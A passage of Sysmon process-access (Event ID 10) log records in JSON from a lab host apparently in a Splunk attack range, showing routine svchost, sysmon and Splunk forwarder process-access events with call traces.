05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103F260500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103F260500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
